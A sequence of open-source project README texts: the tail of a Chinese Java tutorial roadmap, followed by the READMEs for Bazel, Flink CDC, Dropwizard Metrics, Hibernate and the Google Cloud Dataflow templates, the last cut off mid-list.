接口:明明就一个空的接口嘛](docs/io/Serializbale.md) - [深入探讨 Java transient 关键字](docs/io/transient.md) ## 异常处理 - [一文彻底搞懂Java异常处理,YYDS](docs/exception/gailan.md) - [深入理解 Java 中的 try-with-resources](docs/exception/try-with-resources.md) - [Java异常处理的20个最佳实践](docs/exception/shijian.md) - [空指针NullPointerException的传说](docs/exception/npe.md) - [try-catch 捕获异常真的会影响性能吗?](docs/exception/try-catch-xingneng.md) ## 常用工具类 - [Java Scanner:扫描控制台输入的工具类](docs/common-tool/scanner.md) - [Java Arrays:专为数组而生的工具类](docs/common-tool/arrays.md) - [Apache StringUtils:专为Java字符串而生的工具类](docs/common-tool/StringUtils.md) - [Objects:专为操作Java对象而生的工具类](docs/common-tool/Objects.md) - [Java Collections:专为集合而生的工具类](docs/common-tool/collections.md) - [Hutool:国产良心工具包,让你的Java变得更甜](docs/common-tool/hutool.md) - [Guava:Google开源的Java工具库,太强大了](docs/common-tool/guava.md) - [其他常用Java工具类:IpUtil、MDC、ClassUtils、BeanUtils、ReflectionUtils](docs/common-tool/utils.md) ## Java新特性 - [Java 8 Stream流:掌握流式编程的精髓](docs/java8/stream.md) - [Java 8 Optional最佳指南:解决空指针问题的优雅之选](docs/java8/optional.md) - [深入浅出Java 8 Lambda表达式:探索函数式编程的魅力](docs/java8/Lambda.md) - [Java 14 开箱,新特性Record、instanceof、switch香香香香](docs/java8/java14.md) ## Java网络编程 - [Java网络编程的基础:计算机网络](docs/socket/network-base.md) - [Java Socket:飞鸽传书的网络套接字](docs/socket/socket.md) - [牛逼,用Java Socket手撸了一个HTTP服务器](docs/socket/http.md) ## Java NIO - [Java NIO 比传统 IO 强在哪里?](docs/nio/nio-better-io.md) - [一文彻底解释清楚Java 中的NIO、BIO和AIO](docs/nio/BIONIOAIO.md) - [详解Java NIO的Buffer缓冲区和Channel通道](docs/nio/buffer-channel.md) - [聊聊 Java NIO中的Paths、Files](docs/nio/paths-files.md) - [Java NIO 网络编程实践:从入门到精通](docs/nio/network-connect.md) - [一文彻底理解Java IO模型](docs/nio/moxing.md) ## 重要知识点 - [Java命名规范:编写可读性强的代码](docs/basic-extra-meal/java-naming.md) - [解决中文乱码:字符编码全攻略 - ASCII、Unicode、UTF-8、GB2312详解](docs/basic-extra-meal/java-unicode.md) - [深入浅出Java拆箱与装箱](docs/basic-extra-meal/box.md) - [深入理解Java浅拷贝与深拷贝](docs/basic-extra-meal/deep-copy.md) - [Java hashCode方法解析](docs/basic-extra-meal/hashcode.md) - [Java到底是值传递还是引用传递?](docs/basic-extra-meal/pass-by-value.md) - [为什么无法实现真正的泛型?](docs/basic-extra-meal/true-generic.md) - [Java 反射详解](docs/basic-extra-meal/fanshe.md) ## Java并发编程 - [并发编程小册简介](docs/thread/readme.md) - [Java多线程入门](docs/thread/wangzhe-thread.md) - [获取线程的执行结果](docs/thread/callable-future-futuretask.md) - [Java线程的6种状态及切换](docs/thread/thread-state-and-method.md) - [线程组和线程优先级](docs/thread/thread-group-and-thread-priority.md) - [进程与线程的区别](docs/thread/why-need-thread.md) - [多线程带来了哪些问题?](docs/thread/thread-bring-some-problem.md) - [Java的内存模型(JMM)](docs/thread/jmm.md) - [volatile关键字解析](docs/thread/volatile.md) - [synchronized关键字解析](docs/thread/synchronized-1.md) - [synchronized的四种锁状态](docs/thread/synchronized.md) - [深入浅出偏向锁](docs/thread/pianxiangsuo.md) - [CAS详解](docs/thread/cas.md) - [AQS详解](docs/thread/aqs.md) - [锁分类和 JUC](docs/thread/lock.md) - [重入锁ReentrantLock](docs/thread/reentrantLock.md) - [读写锁ReentrantReadWriteLock](docs/thread/ReentrantReadWriteLock.md) - [等待通知条件Condition](docs/thread/condition.md) - [线程阻塞唤醒类LockSupport](docs/thread/LockSupport.md) - [Java的并发容器](docs/thread/map.md) - [并发容器ConcurrentHashMap](docs/thread/ConcurrentHashMap.md) - [非阻塞队列ConcurrentLinkedQueue](docs/thread/ConcurrentLinkedQueue.md) - [阻塞队列BlockingQueue](docs/thread/BlockingQueue.md) - [并发容器CopyOnWriteArrayList](docs/thread/CopyOnWriteArrayList.md) - [本地变量ThreadLocal](docs/thread/ThreadLocal.md) - [线程池](docs/thread/pool.md) - [定时任务ScheduledThreadPoolExecutor](docs/thread/ScheduledThreadPoolExecutor.md) - [原子操作类Atomic](docs/thread/atomic.md) - [魔法类 Unsafe](docs/thread/Unsafe.md) - [通信工具类](docs/thread/CountDownLatch.md) - [Fork/Join](docs/thread/fork-join.md) - [生产者-消费者模式](docs/thread/shengchanzhe-xiaofeizhe.md) ## Java虚拟机 - [JVM小册简介](docs/jvm/readme.md) - [大白话带你认识JVM](docs/jvm/what-is-jvm.md) - [JVM是如何运行Java代码的?](docs/jvm/how-run-java-code.md) - [Java的类加载机制(付费)](docs/jvm/class-load.md) - [Java的类文件结构](docs/jvm/class-file-jiegou.md) - [从javap的角度轻松看懂字节码](docs/jvm/bytecode.md) - [栈虚拟机与寄存器虚拟机](docs/jvm/vm-stack-register.md) - [字节码指令详解](docs/jvm/zijiema-zhiling.md) - [深入理解JVM的栈帧结构](docs/jvm/stack-frame.md) - [深入理解JVM的运行时数据区](docs/jvm/neicun-jiegou.md) - [深入理解JVM的垃圾回收机制](docs/jvm/gc.md) - [深入理解 JVM 的垃圾收集器:CMS、G1、ZGC](docs/jvm/gc-collector.md) - [Java 创建的对象到底放在哪?](docs/jvm/whereis-the-object.md) - [深入理解JIT(即时编译)](docs/jvm/jit.md) - [JVM 性能监控之命令行篇](docs/jvm/console-tools.md) - [JVM 性能监控之可视化篇](docs/jvm/view-tools.md) - [阿里开源的 Java 诊断神器 Arthas](docs/jvm/arthas.md) - [内存溢出排查优化实战](docs/jvm/oom.md) - [CPU 100% 排查优化实践](docs/jvm/cpu-percent-100.md) - [JVM 核心知识点总结](docs/jvm/zongjie.md) # Java进阶 > - **到底能不能成为一名合格的 Java 程序员,从理论走向实战?Java进阶这部分内容就是一个分水岭**! > - 纸上得来终觉浅,须知此事要躬行。 ## 开发/构建工具 > 工欲善其事必先利其器,这句话大家都耳熟能详了,熟练使用开发/构建工具可以让我们极大提升开发效率,解放生产力。 - [5分钟带你深入浅出搞懂Nginx](docs/nginx/nginx.md) ### IDEA > 集成开发环境,Java 党主要就是 Intellij IDEA 了,号称史上最强大的 Java 开发工具,没有之一。 - [分享 4 个阅读源码必备的 IDEA 调试技巧](docs/ide/4-debug-skill.md) - [分享 1 个可以在 IDEA 里下五子棋的插件](docs/ide/xechat.md) - [分享 10 个可以一站式开发的 IDEA 神级插件](docs/ide/shenji-chajian-10.md) ### Maven > Maven 是目前比较流行的一个项目构建工具,基于 pom 坐标来帮助我们管理第三方依赖,以及项目打包。 - [终于把项目构建神器Maven捋清楚了~](docs/maven/maven.md) ### Git > Git 是一个分布式版本控制系统,缔造者是大名鼎鼎的林纳斯·托瓦茲 (Linus Torvalds),Git 最初的目的是为了能更好的管理 Linux 内核源码。如今,Git 已经成为全球软件开发者的标配。如果说 Linux 项目促成了开源软件的成功并改写了软件行业的格局,那么 Git 则是改变了全世界开发者的工作方式和写作方式。 - [1小时彻底掌握Git](docs/git/git-qiyuan.md) - [GitHub 远程仓库端口切换](docs/git/port-22-to-443.md) ## Spring - [Spring AOP扫盲](docs/springboot/aop-log.md) - [Spring IoC扫盲](docs/springboot/ioc.md) ## SpringBoot - [一分钟快速搭建Spring Boot项目](docs/springboot/initializr.md) - [Spring Boot 整合 lombok](docs/springboot/lombok.md) - [Spring Boot 整合 MySQL 和 Druid](docs/springboot/mysql-druid.md) - [Spring Boot 整合 JPA](docs/springboot/jpa.md) - [Spring Boot 整合 Thymeleaf 模板引擎](docs/springboot/thymeleaf.md) - [Spring Boot 如何开启事务支持?](docs/springboot/transaction.md) - [Spring Boot 中使用过滤器、拦截器、监听器](docs/springboot/Filter-Interceptor-Listener.md) - [Spring Boot 整合 Redis 实现缓存](docs/redis/redis-springboot.md) - [Spring Boot 整合 Logback 定制日志框架](docs/springboot/logback.md) - [Spring Boot 整合 Swagger-UI 实现在线API文档](docs/springboot/swagger.md) - [Spring Boot 整合 Knife4j,美化强化丑陋的Swagger](docs/gongju/knife4j.md) - [Spring Boot 整合 Spring Task 实现定时任务](docs/springboot/springtask.md) - [Spring Boot 整合 MyBatis-Plus AutoGenerator 生成编程喵项目骨架代码](docs/kaiyuan/auto-generator.md) - [Spring Boot 整合Quartz实现编程喵定时发布文章](docs/springboot/quartz.md) - [Spring Boot 整合 MyBatis](docs/springboot/mybatis.md) - [一键部署 Spring Boot 到远程 Docker 容器](docs/springboot/docker.md) - [如何在本地(macOS环境)跑起来编程喵(Spring Boot+Vue)项目源码?](docs/springboot/macos-codingmore-run.md) - [如何在本地(Windows环境)跑起来编程喵(Spring Boot+Vue)项目源码?](docs/springboot/windows-codingmore-run.md) - [编程喵🐱实战项目如何在云服务器上跑起来?](docs/springboot/linux-codingmore-run.md) - [SpringBoot中处理校验逻辑的两种方式:Hibernate Validator+全局异常处理](docs/springboot/validator.md) ## Netty - [超详细Netty入门,看这篇就够了!](docs/netty/rumen.md) ## 辅助工具 - [Chocolatey:一款GitHub星标8.2k+的Windows命令行软件管理器,好用到爆!](docs/gongju/choco.md) - [Homebrew,GitHub 星标 32.5k+的 macOS 命令行软件管理神器,功能真心强大!](docs/gongju/brew.md) - [Tabby:一款逼格更高的开源终端工具,GitHub 星标 21.4k](docs/gongju/tabby.md) - [Warp:号称下一代终端神器,GitHub星标2.8k+,用完爱不释手](docs/gongju/warp.md) - [WindTerm:新一代开源免费的终端工具,GitHub星标6.6k+,太酷了!](docs/gongju/windterm.md) - [chiner:干掉 PowerDesigner,国人开源的数据库设计工具,界面漂亮,功能强大](docs/gongju/chiner.md) - [DBeaver:干掉付费的 Navicat,操作所有数据库就靠它了!](docs/gongju/DBeaver.md) ## 开源轮子 - [Forest:一款极简的声明式HTTP调用API框架](docs/gongju/forest.md) - [Junit:一个开源的Java单元测试框架](docs/gongju/junit.md) - [fastjson:阿里巴巴开源的JSON解析库](docs/gongju/fastjson.md) - [Gson:Google开源的JSON解析库](docs/gongju/gson.md) - [Jackson:GitHub上star数最多的JSON解析库](docs/gongju/jackson.md) - [Log4j:Java日志框架的鼻祖](docs/gongju/log4j.md) - [Log4j 2:Apache维护的一款高性能日志记录工具](docs/gongju/log4j2.md) - [Logback:Spring Boot内置的日志处理框架](docs/gongju/logback.md) - [SLF4J:阿里巴巴强制使用的日志门面担当](docs/gongju/slf4j.md) ## 分布式 - [全文搜索引擎Elasticsearch入门教程](docs/elasticsearch/rumen.md) - [可能是把ZooKeeper概念讲的最清楚的一篇文章](docs/zookeeper/jibenjieshao.md) - [微服务网关:从对比到选型,由理论到实践](docs/microservice/api-wangguan.md) ## 消息队列 - [RabbitMQ入门教程(概念、应用场景、安装、使用)](docs/mq/rabbitmq-rumen.md) - [怎么确保消息100%不丢失?](docs/mq/100-budiushi.md) - [Kafka核心知识点大梳理](docs/mq/kafka.md) # 数据库 > - **简而言之,就是按照数据结构来组织、存储和管理数据的仓库**。几乎所有的 Java 后端开发都要学习数据库这块的知识,包括关系型数据库 MySQL,缓存中间件 Redis,非关系型数据库 MongoDB 等。 ## MySQL - [MySQL 的安装和连接,结合技术派实战项目来讲](docs/mysql/install.md) - [MySQL 的数据库操作,利用 Spring Boot 实现数据库的自动创建](docs/mysql/database.md) - [MySQL 表的基本操作,结合技术派的表自动初始化来讲](docs/mysql/table.md) - [MySQL 的数据类型,4000 字 20 张手绘图,彻底掌握](docs/mysql/data-type.md) - [MySQL 的字符集和比较规则,从跟上掌握](docs/mysql/charset.md) - [MySQL bin目录下的那些可执行文件,包括备份数据库、导入 CSV 等](docs/mysql/bin.md) - [MySQL 的字段属性,默认值、是否为空、主键、自增、ZEROLFILL等一网打尽](docs/mysql/column.md) - [MySQL 的简单查询,开始踏上 SELECT 之旅](docs/mysql/select-simple.md) - [MySQL 的 WEHRE 条件查询,重点搞懂 % 通配符](docs/mysql/select-where.md) - [如何保障MySQL和Redis的数据一致性?](docs/mysql/redis-shuju-yizhixing.md) - [从根上理解 MySQL 的事务](docs/mysql/lijie-shiwu.md) - [浅入深出 MySQL 中事务的实现](docs/mysql/shiwu-shixian.md) ## Redis - [Redis入门(适合新手)](docs/redis/rumen.md) - [聊聊缓存雪崩、穿透、击穿](docs/redis/xuebeng-chuantou-jichuan.md) ## MongoDB - [MongoDB最基础入门教程](docs/mongodb/rumen.md) # 计算机基础 > - **计算机基础包括操作系统、计算机网络、计算机组成原理、数据结构与算法等**。对于任何一名想要走得更远的 Java 后端开发来说,都是必须要花时间和精力去夯实的。 > - 万丈高露平地起,勿在浮沙筑高台。 - [操作系统核心知识点大梳理](docs/cs/os.md) - [计算机网络核心知识点大梳理](docs/cs/wangluo.md) # 求职面试 > - **学习了那么多 Java 知识,耗费了无数的脑细胞,熬掉了无数根秀发,为的是什么?当然是谋取一份心仪的 offer 了**。那八股文、面试题、城市选择、优质面经又怎能少得了呢? > - 千淘万漉虽辛苦,吹尽狂沙始到金。 ## 面试题&八股文 - [34 道 Java 精选面试题👍](docs/interview/java-34.md) - [13 道 Java HashMap 精选面试题👍](docs/interview/java-hashmap-13.md) - [60 道 MySQL 精选面试题👍](docs/interview/mysql-60.md) - [15 道 MySQL 索引精选面试题👍](docs/interview/mysql-suoyin-15.md) - [12 道 Redis 精选面试题👍](docs/interview/redis-12.md) - [40 道 Nginx 精选面试题👍](docs/interview/nginx-40.md) - [17 道 Dubbo 精选面试题👍](docs/interview/dubbo-17.md) - [40 道 Kafka 精选面试题👍](docs/interview/kafka-40.md) - [Java 基础背诵版八股文必看🍉](docs/interview/java-basic-baguwen.md) - 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# [Bazel](https://bazel.build) *{Fast, Correct} - Choose two* Build and test software of any size, quickly and reliably. * **Speed up your builds and tests**: Bazel rebuilds only what is necessary. With advanced local and distributed caching, optimized dependency analysis and parallel execution, you get fast and incremental builds. * **One tool, multiple languages**: Build and test Java, C++, Android, iOS, Go, and a wide variety of other language platforms. Bazel runs on Windows, macOS, and Linux. * **Scalable**: Bazel helps you scale your organization, codebase, and continuous integration solution. It handles codebases of any size, in multiple repositories or a huge monorepo. * **Extensible to your needs**: Easily add support for new languages and platforms with Bazel's familiar extension language. Share and re-use language rules written by the growing Bazel community. ## Getting Started * [Install Bazel](https://bazel.build/install) * [Get started with Bazel](https://bazel.build/start) * Follow our tutorials: - [Build C++](https://bazel.build/tutorials/cpp) - [Build Java](https://bazel.build/tutorials/java) - [Android](https://bazel.build/tutorials/android-app) - [iOS](https://github.com/bazelbuild/rules_apple/blob/master/doc/tutorials/ios-app.md) ## Documentation * [Bazel command line](https://bazel.build/docs/user-manual) * [Rule reference](https://bazel.build/reference/be/overview) * [Use the query command](https://bazel.build/reference/query) * [Extend Bazel](https://bazel.build/rules/concepts) * [Write tests](https://bazel.build/reference/test-encyclopedia) * [Roadmap](https://bazel.build/community/roadmaps) * [Who is using Bazel?](https://bazel.build/community/users) ## Reporting a Vulnerability To report a security issue, please email security@bazel.build with a description of the issue, the steps you took to create the issue, affected versions, and, if known, mitigations for the issue. Our vulnerability management team will respond within 3 working days of your email. If the issue is confirmed as a vulnerability, we will open a Security Advisory. This project follows a 90 day disclosure timeline. ## Contributing to Bazel See [CONTRIBUTING.md](CONTRIBUTING.md) [![Build status](https://badge.buildkite.com/1fd282f8ad98c3fb10758a821e5313576356709dd7d11e9618.svg?status=master)](https://buildkite.com/bazel/bazel-bazel)
Flink CDC is a streaming data integration tool
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<p align="center"> <a href="https://nightlies.apache.org/flink/flink-cdc-docs-stable/"><img src="docs/static/fig/flinkcdc-logo.png" alt="Flink CDC" style="width: 375px;"></a> </p> <p align="center"> <a href="https://github.com/apache/flink-cdc/" target="_blank"> <img src="https://img.shields.io/github/stars/apache/flink-cdc?style=social&label=Star&maxAge=2592000" alt="Test"> </a> <a href="https://github.com/apache/flink-cdc/releases" target="_blank"> <img src="https://img.shields.io/github/v/release/apache/flink-cdc?color=yellow" alt="Release"> </a> <a href="https://github.com/apache/flink-cdc/actions/workflows/flink_cdc.yml" target="_blank"> <img src="https://img.shields.io/github/actions/workflow/status/apache/flink-cdc/flink_cdc.yml?branch=master" alt="Build"> </a> <a href="https://github.com/apache/flink-cdc/tree/master/LICENSE" target="_blank"> <img src="https://img.shields.io/static/v1?label=license&message=Apache License 2.0&color=white" alt="License"> </a> </p> Flink CDC is a distributed data integration tool for real time data and batch data. Flink CDC brings the simplicity and elegance of data integration via YAML to describe the data movement and transformation in a [Data Pipeline](docs/content/docs/core-concept/data-pipeline.md). The Flink CDC prioritizes efficient end-to-end data integration and offers enhanced functionalities such as full database synchronization, sharding table synchronization, schema evolution and data transformation. ![Flink CDC framework desigin](docs/static/fig/architecture.png) ### Getting Started 1. Prepare a [Apache Flink](https://nightlies.apache.org/flink/flink-docs-master/docs/try-flink/local_installation/#starting-and-stopping-a-local-cluster) cluster and set up `FLINK_HOME` environment variable. 2. [Download](https://github.com/apache/flink-cdc/releases) Flink CDC tar, unzip it and put jars of pipeline connector to Flink `lib` directory. 3. Create a **YAML** file to describe the data source and data sink, the following example synchronizes all tables under MySQL app_db database to Doris : ```yaml source: type: mysql name: MySQL Source hostname: port: 3306 username: admin password: pass tables: adb.\.* server-id: 5401-5404 sink: type: doris name: Doris Sink fenodes: username: root password: pass pipeline: name: MySQL to Doris Pipeline parallelism: 4 ``` 4. Submit pipeline job using `flink-cdc.sh` script. ```shell bash bin/flink-cdc.sh /path/mysql-to-doris.yaml ``` 5. View job execution status through Flink WebUI or downstream database. Try it out yourself with our more detailed [tutorial](docs/content/docs/get-started/quickstart/mysql-to-doris.md). You can also see [connector overview](docs/content/docs/connectors/overview.md) to view a comprehensive catalog of the connectors currently provided and understand more detailed configurations. ### Join the Community There are many ways to participate in the Apache Flink CDC community. The [mailing lists](https://flink.apache.org/what-is-flink/community/#mailing-lists) are the primary place where all Flink committers are present. For user support and questions use the user mailing list. If you've found a problem of Flink CDC, please create a [Flink jira](https://issues.apache.org/jira/projects/FLINK/summary) and tag it with the `Flink CDC` tag. Bugs and feature requests can either be discussed on the dev mailing list or on Jira. ### Contributing Welcome to contribute to Flink CDC, please see our [Developer Guide](docs/content/docs/developer-guide/contribute-to-flink-cdc.md) and [APIs Guide](docs/content/docs/developer-guide/understand-flink-cdc-api.md). ### License [Apache 2.0 License](LICENSE). ### Special Thanks The Flink CDC community welcomes everyone who is willing to contribute, whether it's through submitting bug reports, enhancing the documentation, or submitting code contributions for bug fixes, test additions, or new feature development. Thanks to all contributors for their enthusiastic contributions. <a href="https://github.com/apache/flink-cdc/graphs/contributors"> <img src="https://contrib.rocks/image?repo=apache/flink-cdc"/> </a>
A configuration as code language with rich validation and tooling.
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:chart_with_upwards_trend: Capturing JVM- and application-level metrics. So you know what's going on.
dropwizard-metrics java metrics metrics-library
Metrics ======= [![Java CI](https://github.com/dropwizard/metrics/workflows/Java%20CI/badge.svg)](https://github.com/dropwizard/metrics/actions?query=workflow%3A%22Java+CI%22+branch%3Arelease%2F4.2.x) [![Maven Central](https://img.shields.io/maven-central/v/io.dropwizard.metrics/metrics-core/4.2)](https://maven-badges.herokuapp.com/maven-central/io.dropwizard.metrics/metrics-core/) [![Javadoc](http://javadoc-badge.appspot.com/io.dropwizard.metrics/metrics-core.svg)](http://www.javadoc.io/doc/io.dropwizard.metrics/metrics-core) [![Contribute with Gitpod](https://img.shields.io/badge/Contribute%20with-Gitpod-908a85?logo=gitpod)](https://gitpod.io/#https://github.com/dropwizard/metrics/tree/release/4.2.x) *📈 Capturing JVM- and application-level metrics. So you know what's going on.* For more information, please see [the documentation](https://metrics.dropwizard.io/) ### Versions | Version | Source Branch | Documentation | Status | | ------- | -------------------------------------------------------------------------------- | --------------------------------------------- | ----------------- | | <2.2.x | - | - | 🔴 unmaintained | | 2.2.x | - | [Docs](https://metrics.dropwizard.io/2.2.0/) | 🔴 unmaintained | | 3.0.x | [release/3.0.x branch](https://github.com/dropwizard/metrics/tree/release/3.0.x) | [Docs](https://metrics.dropwizard.io/3.0.2/) | 🔴 unmaintained | | 3.1.x | [release/3.1.x branch](https://github.com/dropwizard/metrics/tree/release/3.1.x) | [Docs](https://metrics.dropwizard.io/3.1.0/) | 🔴 unmaintained | | 3.2.x | [release/3.2.x branch](https://github.com/dropwizard/metrics/tree/release/3.2.x) | [Docs](https://metrics.dropwizard.io/3.2.3/) | 🔴 unmaintained | | 4.0.x | [release/4.0.x branch](https://github.com/dropwizard/metrics/tree/release/4.0.x) | [Docs](https://metrics.dropwizard.io/4.0.6/) | 🔴 unmaintained | | 4.1.x | [release/4.1.x branch](https://github.com/dropwizard/metrics/tree/release/4.1.x) | [Docs](https://metrics.dropwizard.io/4.1.22/) | 🔴 unmaintained | | 4.2.x | [release/4.2.x branch](https://github.com/dropwizard/metrics/tree/release/4.2.x) | [Docs](https://metrics.dropwizard.io/4.2.0/) | 🟢 maintained | | 5.0.x | [release/5.0.x branch](https://github.com/dropwizard/metrics/tree/release/5.0.x) | - | 🟡 on pause | ### Future development New not-backward compatible features (for example, support for tags) will be implemented in a 5.x.x release. The release will have new Maven coordinates, a new package name and a backwards-incompatible API. Source code for 5.x.x resides in the [release/5.0.x branch](https://github.com/dropwizard/metrics/tree/release/5.0.x). License ------- Copyright (c) 2010-2013 Coda Hale, Yammer.com, 2014-2021 Dropwizard Team Published under Apache Software License 2.0, see LICENSE
Hibernate's core Object/Relational Mapping functionality
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Cloud Dataflow Google-provided templates for solving in-Cloud data tasks
apache-beam bigquery bigtable dataflow-templates google-cloud-dataflow google-cloud-spanner google-cloud-storage
# Google Cloud Dataflow Template Pipelines These Dataflow templates are an effort to solve simple, but large, in-Cloud data tasks, including data import/export/backup/restore and bulk API operations, without a development environment. The technology under the hood which makes these operations possible is the [Google Cloud Dataflow](https://cloud.google.com/dataflow/) service combined with a set of [Apache Beam](https://beam.apache.org/) SDK templated pipelines. Google is providing this collection of pre-implemented Dataflow templates as a reference and to provide easy customization for developers wanting to extend their functionality. [![Open in Cloud Shell](http://gstatic.com/cloudssh/images/open-btn.svg)](https://console.cloud.google.com/cloudshell/editor?cloudshell_git_repo=https%3A%2F%2Fgithub.com%2FGoogleCloudPlatform%2FDataflowTemplates.git) ## Note on Default Branch As of November 18, 2021, our default branch is now named "main". This does not affect forks. If you would like your fork and its local clone to reflect these changes you can follow [GitHub's branch renaming guide](https://docs.github.com/en/repositories/configuring-branches-and-merges-in-your-repository/managing-branches-in-your-repository/renaming-a-branch). ## Building Maven commands should be run on the parent POM. An example would be: ``` mvn clean package -pl v2/pubsub-binary-to-bigquery -am ``` ## Template Pipelines - Get Started - [Word Count](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Word_Count&type=code) - Process Data Continuously (stream) - [Azure Eventhub to Pubsub](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Azure_Eventhub_to_PubSub&type=code) - [Bigtable Change Streams to HBase Replicator](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Bigtable_Change_Streams_to_HBase&type=code) - [Cloud Bigtable change streams to BigQuery](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Bigtable_Change_Streams_to_BigQuery&type=code) - [Cloud Bigtable change streams to Cloud Storage](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Bigtable_Change_Streams_to_Google_Cloud_Storage&type=code) - [Cloud Spanner change streams to BigQuery](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Spanner_Change_Streams_to_BigQuery&type=code) - [Cloud Spanner change streams to Cloud Storage](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Spanner_Change_Streams_to_Google_Cloud_Storage&type=code) - [Cloud Spanner change streams to Pub/Sub](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Spanner_Change_Streams_to_PubSub&type=code) - [Cloud Storage Text to BigQuery (Stream)](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Stream_GCS_Text_to_BigQuery_Flex&type=code) - [Data Masking/Tokenization from Cloud Storage to BigQuery (using Cloud DLP)](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Stream_DLP_GCS_Text_to_BigQuery_Flex&type=code) - [Datastream to BigQuery](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Cloud_Datastream_to_BigQuery&type=code) - [Datastream to Cloud Spanner](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Cloud_Datastream_to_Spanner&type=code) - [Datastream to SQL](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Cloud_Datastream_to_SQL&type=code) - [JMS to Pubsub](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Jms_to_PubSub&type=code) - [Kafka to BigQuery](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Kafka_to_BigQuery&type=code) - [Kafka to Cloud Storage](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Kafka_to_GCS&type=code) - [Kinesis To Pubsub](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Kinesis_To_Pubsub&type=code) - [MongoDB to BigQuery (CDC)](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20MongoDB_to_BigQuery_CDC&type=code) - [Mqtt to Pubsub](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Mqtt_to_PubSub&type=code) - [Ordered change stream buffer to Source DB](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Ordered_Changestream_Buffer_to_Sourcedb&type=code) - [Pub/Sub Avro to BigQuery](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20PubSub_Avro_to_BigQuery&type=code) - [Pub/Sub CDC to Bigquery](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20PubSub_CDC_to_BigQuery&type=code) - [Pub/Sub Proto to BigQuery](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20PubSub_Proto_to_BigQuery&type=code) - [Pub/Sub Subscription or Topic to Text Files on Cloud Storage](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Cloud_PubSub_to_GCS_Text_Flex&type=code) - [Pub/Sub Subscription to BigQuery](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20PubSub_to_BigQuery_Flex&type=code) - [Pub/Sub Topic to BigQuery](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20PubSub_to_BigQuery&type=code) - [Pub/Sub to Avro Files on Cloud Storage](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Cloud_PubSub_to_Avro_Flex&type=code) - [Pub/Sub to Datadog](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Cloud_PubSub_to_Datadog&type=code) - [Pub/Sub to Elasticsearch](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20PubSub_to_Elasticsearch&type=code) - [Pub/Sub to JDBC](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Pubsub_to_Jdbc&type=code) - [Pub/Sub to Kafka](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20PubSub_to_Kafka&type=code) - [Pub/Sub to MongoDB](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Cloud_PubSub_to_MongoDB&type=code) - [Pub/Sub to Pub/Sub](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Cloud_PubSub_to_Cloud_PubSub&type=code) - [Pub/Sub to Redis](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Cloud_PubSub_to_Redis&type=code) - [Pub/Sub to Splunk](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Cloud_PubSub_to_Splunk&type=code) - [Pub/Sub to Text Files on Cloud Storage](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Cloud_PubSub_to_GCS_Text&type=code) - [Pubsub to JMS](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Pubsub_to_Jms&type=code) - [Spanner Change Streams to Sink](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Spanner_Change_Streams_to_Sink&type=code) - [Synchronizing CDC data to BigQuery](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Cdc_To_BigQuery_Template&type=code) - [Text Files on Cloud Storage to Pub/Sub](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Stream_GCS_Text_to_Cloud_PubSub&type=code) - Process Data in Bulk (batch) - [AstraDB to BigQuery](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20AstraDB_To_BigQuery&type=code) - [Avro Files on Cloud Storage to Cloud Bigtable](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20GCS_Avro_to_Cloud_Bigtable&type=code) - [Avro Files on Cloud Storage to Cloud Spanner](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20GCS_Avro_to_Cloud_Spanner&type=code) - [BigQuery export to Parquet (via Storage API)](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20BigQuery_to_Parquet&type=code) - [BigQuery to 